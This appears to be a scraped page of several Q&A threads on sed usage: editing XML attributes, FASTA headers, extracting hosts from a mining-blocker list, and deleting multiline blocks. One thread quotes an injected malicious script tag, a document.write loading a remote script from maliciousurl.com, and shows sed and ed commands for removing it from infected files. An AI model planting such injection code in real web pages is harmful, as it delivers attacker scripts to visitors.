I have a question about using sed to modify file. My file content:
<data-value name="WLS_INSTALL_DIR" value="/home/Oracle/wlserver_10.3">
I want to replace the content of field value="/home/Oracle/wlserver_10.3"
to get this result:
<data-value name="WLS_INSTALL_DIR" value="/u03/Middle_home/Oracle/wlserver_10.3">
I use sed:
sed "6 i/^value=/>/s/value= />\(.*\)/value=\"\/u03\/Oracle/Middleware/wlserver_10.3"\" \/\ /u03/silent.xml
Your sed script has a number of issues.
First off, anything that looks like 6istuff will simply write everything after i ("insert") verbatim as a new line before the sixth line. (Some dialects require a newline after the i and will basically do nothing.)
Secondly, ^value= does not match your input; it would only select a line starting with the string value= (the ^ metacharacter means beginning of line).
Thirdly, the /> in your subsitution regex terminates the substitution and so everything from > onwards is parsed as invalid flags for the substitution. I cannot see the purpose of this part, anyway; it doesn't match your data, and so the regex fails.
What remains after removing all these superfluous and erroneous details is a more or less useful sed script. (I assume the 6 to address only the sixth line of input is intentional, although you don't mention this in the question at all.) I have made some additional minor improvements, such as using % as the substitution delimiter and tightening the regex so that it only ever substitutes a double-quoted value.
sed '6s%value="[^"]*"%value="/u03/Oracle/Middleware/wlserver_10.3"%' /u03/silent.xml
Better than 6 would perhaps be to identify the line with /name="WLS_INSTALL_DIR"/.
Still, as alluded to in a comment, the proper way to manipulate XML is with a dedicated tool such as xsltproc.
Try:
sed 's|/home|/u03/Middle_home|'
Related
I have the following line:
>XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGTCAAATCAATGATATGATTTTATCTCTTCTTAGTAAAGGTAGACTTATAATTAG
AGAAAACAAC
I would like to convert the first line as follows:
>INITWORD/XXX-220_5004_COVID-A6/FINALWORD
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGT...
So far I have managed to add the first word as follows:
sed 's/>/>INITTWORD\//I'
That returns:
>INITWORD/XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGT
How can i add the FINALWORD at the end of the first line?
Just substitute more. sed conveniently allows you to recall the text you matched with a back reference, so just embed that between the things you want to add.
sed 's%^>\(.*\)%>INITWORD/\1/FINALWORD%I' file.fasta
I also added a ^ beginning-of-line anchor, and switched to % delimiters so the slashes don't need to be escaped.
In some more detail, the s command's syntax is s/regex/replacement/flags where regex is a regular expression to match the text you want to replace, and replacement is the text to replace it with. In the regex, you can use grouping parentheses \(...\) to extract some of the matched text into the replacement; so \1 refers to whatever matched the first set of grouping parentheses, \2 to the second, etc. The /flags are optional single-character specifiers which modify the behavior of the command; so for example, a /g flag says to replace every match on a line, instead of just the first one (but we only expect one match per line so it's not necessary or useful here).
The I flag is non-standard but since you are using that, I assume it does something useful for you.
The goal is to use sed to return only the url from each line of FF extension Mining Blocker which uses this format for its regex lines:
{"baseurl":"*://002.0x1f4b0.com/*", "suburl":"*://*/002.0x1f4b0.com/*"},
{"baseurl":"*://003.0x1f4b0.com/*", "suburl":"*://*/003.0x1f4b0.com/*"},
the result should be:
002.0x1f4b0.com
003.0x1f4b0.com
One way would be to keep everything after suburl":"*://*/ then remove each occurrence of /*"},
I found https://unix.stackexchange.com/questions/24140/return-only-the-portion-of-a-line-after-a-matching-pattern but the special characters are a problem.
this won't work:
sed -n -e s#^.*suburl":"*://*/##g hosts
Would someone please show me how to mark the 2 asterisks in the string so they are seen by regex as literal characters, not wildcards?
edit:
sed -n 's#.*://\*/\([^/]\+\)/.*#\1#p' hosts
doesn't work, unfortunately.
regarding character substitution, thanks for directing me to the references.
I reduced the searched-for string to //*/ and used ASCII character codes like this:
sed -n -e s#^.*\d047\d047\d042\d047##g hosts
Unfortunately, that didn't output any changes to the lines.
My assumptions are:
^.*something specifies everything up to and including the last occurrence of "something" in a line
sed -n -e s#search##g deletes (replace with nothing) "search" within a line
So, this line:
sed -n -e s#^.*\d047\d047\d042\d047##g hosts
Should output everything after //*/ in each line...except it doesn't.
What is incorrect with that line?
Regarding deleting everything including and after the first / AFTER that first operation, yes, that's wanted too.
This might work for you (GNU sed):
sed -n 's#.*://\*/\([^/]\+\)/.*#\1#p' file
Match greedily (the longest string that matches) all characters up to ://*/, followed by a group of characters (which will be referred to as \1) that do not match a /, followed by the rest of the line and replace it by the group \1.
N.B. the sed substitution delimiters are arbitrary, in this case chosen to be # so as make pattern matching / easier. Also the character * on the left hand side of the substitution command may be interpreted as a meta character that means zero or more of the previous character/group and so is quoted \* so that it does not mistakenly exert this property. Finally, using the option -n toggles off the usual printing of every thing in the pattern space after all the sed commands have been executed. The p flag on the substitution command, prints the pattern space following a successful substitution, therefore only URL's will appear in the output or nothing.
I have a simple sed command that I am using to replace everything between (and including) //thistest.com-- and --thistest.com with nothing (remove the block all together):
sudo sed -i "s#//thistest\.com--.*--thistest\.com##g" my.file
The contents of my.file are:
//thistest.com--
zone "awebsite.com" {
type master;
file "some.stuff.com.hosts";
};
//--thistest.com
As I am using # as my delimiter for the regex, I don't need to escape the / characters. I am also properly (I think) escaping the . in .com. So I don't see exactly what is failing.
Why isn't the entire block being replaced?
You have two problems:
Sed doesn't do multiline pattern matches—at least, not the way you're expecting it to. However, you can use multiline addresses as an alternative.
Depending on your version of sed, you may need to escape alternate delimiters, especially if you aren't using them solely as part of a substitution expression.
So, the following will work with your posted corpus in both GNU and BSD flavors:
sed '\#^//thistest\.com--#, \#^//--thistest\.com# d' /tmp/corpus
Note that in this version, we tell sed to match all lines between (and including) the two patterns. The opening delimiter of each address pattern is properly escaped. The command has also been changed to d for delete instead of s for substitute, and some whitespace was added for readability.
I've also chosen to anchor the address patterns to the start of each line. You may or may not find that helpful with this specific corpus, but it's generally wise to do so when you can, and doesn't seem to hurt your use case.
# separation by line with 1 s//
sed -n -e 'H;${x;s#^\(.\)\(.*\)\1//thistest.com--.*\1//--thistest.com#\2#;p}' YourFile
# separation by line with address pattern
sed -e '\#//thistest.com--#,\#//--thistest.com# d' YourFile
# separation only by char (could be CR, CR/LF, ";" or "oneline") with s//
sed -n -e '1h;1!H;${x;s#//thistest.com--.*\1//--thistest.com##;p}' YourFile
Note:
assuming there is only 1 section thistest per file (if not, it remove anything between the first opening until the last closing section) for the use of s//
does not suite for huge file (load entire file into memory) with s//
sed using addresses pattern cannot select section on the same line, it search 1st pattern to start, and a following line to stop but very efficient on big file and/or multisection
I found some malicious JavaScript inserted into dozens of files.
The malicious code looks like this:
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');
/*/123456*/
Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."
In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.
sed -i '/pattern to match/d' ./infile
But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.
So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?
I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js
You need to match on the begin and end comments, not the document.write line:
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
This uses the % symbol in place of the more normal / to delimit the patterns, which is usually a good idea when the pattern contains slashed and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
From the sed manual on Mac OS X:
In a context address, any character other than a backslash ('\') or newline
character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be
treated literally. For example, in the context address \xabc\xdefx, the RE
delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; it cannot do relative offsets (/x/+1 is not allowed, let alone /x/-1). At that point, you probably fall back on ed (or perhaps ex):
ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.
This is a simple question, I'm not sure if i'm able to do this with sed/awk
How can I make sed search for these 3 lines and replace with a line with a determined string?
<Blarg>
<Bllarg>
<Blllarg>
replace with
<test>
I tried with sed "s/<Blarg>\n<Bllarg>\n<Blllarg>/<test>/g" But it just don't seem to find these lines. Probably something with my break line character (?) \n. Am I missing something?
Because sed usually handles only one line at a time, your pattern will never match. Try this:
sed '1N;$!N;s/<Blarg>\n<Bllarg>\n<Blllarg>/<test>/;P;D' filename
This might work for you:
sed '/<Blarg>/ {N;N;s/<Blarg>\n<Bllarg>\n<Blllarg>/<test>/}' <filename>
It works as follows:
Search the file till <Blarg> is found
Then append the two following lines to the current pattern space using N;N;
Check if the current pattern space matches <Blarg>\n<Bllarg>\n<Blllarg>
If so, then substitute it with <test>
You can use range addresses with regular expressions an the c command, which does exactly what you are asking for:
sed '/<Blarg>/,/<Blllarg>/c<test>' filename